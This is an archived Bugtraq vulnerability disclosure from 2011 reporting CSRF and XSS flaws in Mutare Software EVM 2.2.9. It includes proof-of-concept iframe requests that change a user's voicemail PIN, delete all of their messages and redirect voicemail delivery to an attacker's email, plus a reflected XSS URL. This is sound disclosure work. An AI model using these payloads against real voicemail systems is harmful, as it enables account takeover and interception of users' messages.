| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <055601cbda88$7a2c92a0$6e85b7e0$@gmail.com> Date: Fri, 4 Mar 2011 08:23:17 -0800 From: "Travis Lee" <travisle@...il.com> To: <bugtraq@...urityfocus.com> Subject: Mutare Software EVM - CSRF and XSS Vulnerabilities Description: Mutare Software EVM 2.2.9 (possibly earlier versions) is vulnerable to CSRF and XSS. An attacker could do the following to a users' EVM settings: A. Change their EVM PIN B. Delete all of their voice messages C. Change or add any of their delivery address for voicemails CERT Vulnerability Note: http://www.kb.cert.org/vuls/id/136612 Proof of Concept: CSRF: <html> <body> <h1>Mutare Software EVM CSRF PoC</h2> <!-- <iframe src="https://evoicemail.domain/ChangePin.asp?NewPIN=<insert new pin here>&VerifyPIN=<insert same new pin here>&ChangePIN=*" border="0" height="300" width="400"> --> <!-- <iframe src="https://evoicemail.domain/deletemsg.asp?SysID=4&PIN=&MsgDT=10/8/2010%20 9:26:00%20AM&CCM=ALL&Mailbox=<insert mailbox number here>" border="0" height="300" width="400"> --> <!-- <iframe src="https://evoicemail.domain/evmoctel.asp?PwdChanged=&Password=&AllowN=T&N otifyEveryMsg=-1&Address1=<insert email address here>&Address2=&Address3=&AllowD=T&IncludeVoice=ALL&AddressD=<insert email address here>&ActiveD1=*&AddressD2=&AddressD3=&AttachmentFormat=MP3&DeliveryType=0&L astDelivery=10%2F8%2F2010+9%3A26%3A01+AM&LastDeliveryDB=10%2F8%2F2010+9%3A26 %3A01+AM&AllowF=F&PopF=T&AddressF=&Update=True" border="0" height="300" width="600"> --> </body> </html> XSS: https://evoicemail.domain.com/default.asp?Subscriber=12345%22%20onclick=%22j avascript:alert%281%29;
Powered by blists - more mailing lists